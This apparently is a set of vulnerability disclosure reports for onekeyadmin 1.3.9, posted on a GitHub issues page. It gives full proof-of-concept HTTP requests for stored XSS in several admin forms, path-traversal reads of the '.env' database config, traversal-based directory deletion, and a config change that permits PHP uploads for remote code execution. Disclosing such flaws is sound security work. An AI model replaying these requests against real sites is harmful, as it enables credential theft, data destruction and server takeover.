keheying / onekeyadmin Goto Github PK

1. Vulnerability affects product:onekeyadmin
2. Vulnerability affects version 1.3.9
3. Vulnerability type:storage xss vulnerability（Cross-site scripting）
4. Vulnerability Details：
   url
   http://192.168.3.129:8091/admin1#adminMenu/index

poc
POST /admin1/adminMenu/save HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 145
Accept: /
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/adminMenu/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def
Connection: close

{"id":"","icon":"","title":"test<img src=1 onerror=alert("xss");>","pid":0,"sort":0,"path":"test","ifshow":1,"logwriting":1,"theme":"template"}

then you can view xss in url
http://192.168.3.129:8091/admin1#adminMenu/index

1. Vulnerability affects product:onekeyadmin
2. Vulnerability affects version 1.3.9
3. Vulnerability type:storage xss vulnerability（Cross-site scripting）
4. Vulnerability Details：
   <img src=1 onerror=alert("xss");>
   url
   http://192.168.3.129:8091/admin1#user/index

{"id":1,"group_id":73,"nickname":"test<img src=1 onerror=alert("xss");>","sex":0,"email":"[email protected]","mobile":"","password":"","cover":"","describe":"","birthday":"2023-01-09","now_integral":0,"history_integral":0,"balance":"0.00","pay_paasword":"","login_ip":"","login_count":0,"login_time":"2023-01-09 22:09:57","update_time":"2023-01-09 22:09:57","create_time":"2023-01-09 22:09:57","status":1,"reason":null,"hide":1,"group_title":"11112","url":"http://192.168.3.129:8091/user/info.html?id=1&theme=template","theme":"template"}
then you can view xss in url
http://192.168.3.129:8091/admin1#user/index

Vulnerability affects product:onekeyadmin
Vulnerability affects version 1.3.9
Vulnerability type:file reading
Vulnerability Details：
Vulnerability location
app\admin\controller\Curd#code Here the file_get_contents function is called without any filtering

So we can write the file we want to read into menu.png to cause any file to be read

Vulnerability recurrence
Here we read the database configuration file .env in the root directory

poc
`POST /admin1/curd/code HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 59
Accept: /
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/curd/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def
Connection: close

{"name":"test","title":"test","cover":"../.env","table":[]}`

You can see that the file was successfully written to our menu.png, causing any file to be read
http://192.168.3.129:8091/plugins/test/menu.png

1. Vulnerability affects product:onekeyadmin
2. Vulnerability affects version 1.3.9
3. Vulnerability type:storage xss vulnerability（Cross-site scripting）
4. Vulnerability Details：
   <img src=1 onerror=alert("xss");>
   url
   http://192.168.3.129:8091/admin1#catalog/index

{"cover":"","title":"test<img src=1 onerror=alert("xss");>","pid":0,"show":1,"type":"page","seo_url":"test","bind_html":"","group_id":[],"links_type":0,"links_value":{},"sort":0,"id":"","status":1,"mobile":1,"blank":0,"description":"","content":"","seo_title":"","seo_keywords":"","seo_description":"","field":[],"theme":"template"}

then you can view xss in url
http://192.168.3.129:8091/admin1#catalog/index

Vulnerability affects product:onekeyadmin
Vulnerability affects version 1.3.9
Vulnerability type:file delete
Vulnerability Details：
Background arbitrary folder deletion 1 vulnerability
Vulnerability location
Vulnerability occurs in
app\admin\controller\Themes#delete method

Here the delDirAndFile method of use onekey\File# is called

You can see that if the input is a directory, first traverse and delete the files in the directory and then delete the directory

Vulnerability recurrence
Next I will delete the E:\onekeyadmin-main\public\111\ directory
`POST /admin1/themes/delete HTTP/1.1
Host: 192.168.3.129:8091
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.3.129:8091/admin1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=0f1ac62d78a3647890cbd8acd3d458b7
Connection: close
Content-Length: 17
Content-Type: application/json

{"name":"../111"}`

Vulnerability affects product:onekeyadmin
Vulnerability affects version 1.3.9
Vulnerability type:Remote code execution
Vulnerability Details：
Remote code execution caused by uploading arbitrary files in the background

Vulnerability location
Vulnerability occurs in
app\admin\controller\File#upload Although there are restrictions on ext

but we found
The app\admin\controller\Config#update method can update the limit


Vulnerability recurrence
Conditions Admin
poc
The first step is to update the configuration to allow uploading php files
`POST /admin1/config/update HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 398
Accept: /
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/config/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: .AspNetCore.Antiforgery.WE9Ryc20IQg=CfDJ8HxjCh0oOylDk40Utlg0kuUFWVLtvNW_C4pGl8LD435wIbnnMrZdOHOVRm58Tf9ea-RLT8Cp1rFj-RWlZ5XrTw9-pVKvbqtZLLUaL1326gsyfJyfQ4k6KDwnwVkIpwADhj_KGa_UpcDu8IqL7EsVtWw; .AspNetCore.Session=CfDJ8HxjCh0oOylDk40Utlg0kuXb68MZjsW%2FxifhC6RHBoXE9qf6bZAULAztKWrxdQ9IBGV%2FMomSXYW%2BGJr9gVN1G67kZ5ZHUvzZTEMIYQoRouYf9upg6F4i%2BhutGrGde7h3SIdWEXSN5b50ouWrN9AG8MmS%2FGz8y0InZBJWSgEn5O55; .AspNetCore.Cookies=CfDJ8HxjCh0oOylDk40Utlg0kuXw6Bar2FloCPnRmIK8z27i1l1eQZE9H20ZfZqx9xSA5gVSrZS5hfpqeu4tILEhHunDaAOIqfEmmxsRNV2SMHnwXt_-X0kdVf67A8e1MWMxP-p-tuJZSsa7zVQwOFqTVBFHpgk2dGT3N2U0Th0WR3lQUMdM42wC-XbWYchKNG_fiMCNOPg2MXOFaBmuPreHzuI2wxc-a8KiA7afrdzzz4BnurbEbl8aR8DL0WYq8jFHxZdo1RwJwXULO2qvHYIQzgjZvELBShr4j8C6FJ82VBL5Gq3zFSHAJZ0ddy2q9M0cLUVM4alP8kmxfwfeaVHMZR1cS3_WwDQz5hvGNQuVwIijYdb4HUUpYTKZh2hs_j-o0joMSDe7mdS_3rTvyQ5errD_GkyZZnZL7qZ2jydHhlZMa2vPLOHmLFan6WXhtTk0E_1-zYB117H7tFTA_jJGaNrPVYEuQmmSuBf3kwlWwV1TfGQYL7dPbZDscJdMhn34YnL3LvBlWmY6wRO1ZkZrLmRSsIzcWL7PKHaELAXf8VHz; PHPSESSID=c54fdf181caff75fbd613da826c6e9ae
Connection: close

{"title":"涓婁紶闄愬埗","name":"upload","value":{"admin":{"ext":{"image":"png,jpg,jpeg,bmp,gif,ico","video":"mp4","audio":"mp3","word":"docx,doc","other":"swf,psd,css,js,html,exe,dll,zip,rar,ppt,pdf,xlsx,xls,txt,torrent,dwt,sql,svg,php"},"size":{"image":10485760,"video":104857600,"audio":104857600,"other":104857600,"word":104857600}},"index":{"ext":{"image":"png,jpg"},"size":{"image":2097152}}}}<img width="980" alt="image" src="https://user-images.githubusercontent.com/122217858/211447647-7117f5e5-30ef-4b7e-a730-02e0c5862a2d.png"> The second step is to upload malicious filesPOST /admin1/file/upload HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 280
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryARP8fRC2kb4GP3oP
Accept: /
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/file/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:PHPSESSID=c54fdf181caff75fbd613da826c6e9ae
Connection: close

------WebKitFormBoundaryARP8fRC2kb4GP3oP
Content-Disposition: form-data; name="name"

templatex
------WebKitFormBoundaryARP8fRC2kb4GP3oP
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: text/php

------WebKitFormBoundaryARP8fRC2kb4GP3oP--
`

Vulnerability affects product:onekeyadmin
Vulnerability affects version 1.3.9
Vulnerability type:file delete
Vulnerability Details：
Vulnerability location
Vulnerability occurs in
app\admin\controller\plugins#delete method

Here the delDirAndFile method of use onekey\File# is called

Vulnerability recurrence
Conditions: background administrator rights
Next I will delete the E:\onekeyadmin-main\public\111\ directory
`POST /admin1/plugins/delete HTTP/1.1
Host: 192.168.3.129:8091
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.3.129:8091/admin1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=0f1ac62d78a3647890cbd8acd3d458b7
Connection: close
Content-Length: 17
Content-Type: application/json

{"name":"../111"}`

1. Vulnerability affects product:onekeyadmin
2. Vulnerability affects version 1.3.9
3. Vulnerability type:storage xss vulnerability（Cross-site scripting）
4. Vulnerability Details：
   <img src=1 onerror=alert("xss");>
   url
   http://192.168.3.129:8091/admin1#adminGroup/index

{"id":"","title":"<img src=1 onerror=alert("xss");>","status":1,"role":[],"theme":"template"}`

then you can view xss in
url:
http://192.168.3.129:8091/admin1#adminGroup/index

1. Vulnerability affects product:onekeyadmin
2. Vulnerability affects version 1.3.9
3. Vulnerability type:file reading
4. Vulnerability Details：
   Vulnerability location
   Vulnerability occurs in
   The app\admin\controller\File#download method directly does not filter the incoming url, causing arbitrary file reading

Vulnerability reproduction Read the database configuration file.env
GET /admin1/file/download?url=../.env&title=英文.png HTTP/1.1 Host: 192.168.3.129:8091 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.3.129:8091/admin1/file/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def Connection: close

1. Vulnerability affects product:onekeyadmin
2. Vulnerability affects version 1.3.9
3. Vulnerability type:storage xss vulnerability（Cross-site scripting）
4. Vulnerability Details：
   url
   http://192.168.3.129:8091/admin1#admin/index

{"id":"","cover":"","account":"test<img src=1 onerror=alert("xss");>","email":"[email protected]","nickname":"[email protected]","login_count":"","group_id":1,"password":"[email protected]","status":1,"create_time":"","theme":"template"}

then you can view xss in url
http://192.168.3.129:8091/admin1#admin/index

1. Vulnerability affects product:onekeyadmin
2. Vulnerability affects version 1.3.9
3. Vulnerability type:storage xss vulnerability（Cross-site scripting）
4. Vulnerability Details：

<img src=1 onerror=alert("xss");>
url
http://192.168.3.129:8091/admin1#userGroup/index

poc
POST /admin1/userGroup/save HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 114
Accept: /
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/userGroup/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def
Connection: close

{"id":"","title":"test<img src=1 onerror=alert("xss");>","integral":0,"default":0,"status":1,"theme":"template"}

then you can view xss in url
http://192.168.3.129:8091/admin1#userGroup/index